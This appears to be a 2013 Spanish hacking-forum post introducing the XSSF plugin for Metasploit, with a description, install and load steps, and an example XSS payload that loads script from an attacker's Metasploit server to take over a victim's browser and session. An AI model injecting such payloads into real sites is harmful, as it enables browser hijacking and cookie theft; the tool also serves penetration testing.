send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Xssf Metasploit Plugin

  • 0 Respuestas
  • 2694 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 127
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Junio 15, 2013, 02:52:51 pm »
You are not allowed to view links. Register or Login

Description:
The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation
task into a much easier work. XSSF allows creating a communication channel with the targeted browser
(from a XSS vulnerability) in order to perform further attacks, its integration into the Metasploit Framework
allows users to launch MSF browser based exploit easilly from an XSS vulnerability,In addition, an interesting
though exploiting an XSS inside a victim's browser could be to browse website on attacker's browser,
using the connected victim's session. In most of cases, simply stealing the victim cookie will be sufficient
to realize this action... 'this tool requires metasploit installed to work'




Installation instructions:
1 - Download the latest Metasploit Framework (MSF) release
2 - Update Ruby to 1.9 if not already done
3 - open terminal and navigate to [ /opt/metasploit/../msf3 ] folder
4 - Download XSSF using SVN repository
[ svn export You are not allowed to view links. Register or Login ./ --force ]


XSSF plugin loading instructions:
1 - Start Metasploit Framework (MSF Console for example)
2 - Load XSSF plugin using the command 'load xssf'
3 - XSSF server port can be modified using the command 'load xssf Port=80'
4 - XSSF server URI can be changed using the command 'load xssf Uri=/'
5 - Example of XSS Attack: <script src=”http://IP-Server-MSF:Port/loop?interval=5”></script>


XSSF home:
[ You are not allowed to view links. Register or Login ]
Source Cod:
[ You are not allowed to view links. Register or Login ]
« Última modificación: Agosto 16, 2014, 10:42:54 am por Expermicid »
You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1397
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 18694
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 1705
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Usando PRY en el desarrollo de módulos para Metasploit.

Iniciado por morodog

Respuestas: 2
Vistas: 2409
Último mensaje Octubre 05, 2015, 10:42:08 pm
por Stuxnet
Cómo explotar vulnerabilidad de Windows 7 con Metasploit

Iniciado por Pekador

Respuestas: 2
Vistas: 4229
Último mensaje Abril 16, 2012, 04:35:47 pm
por SPELINAX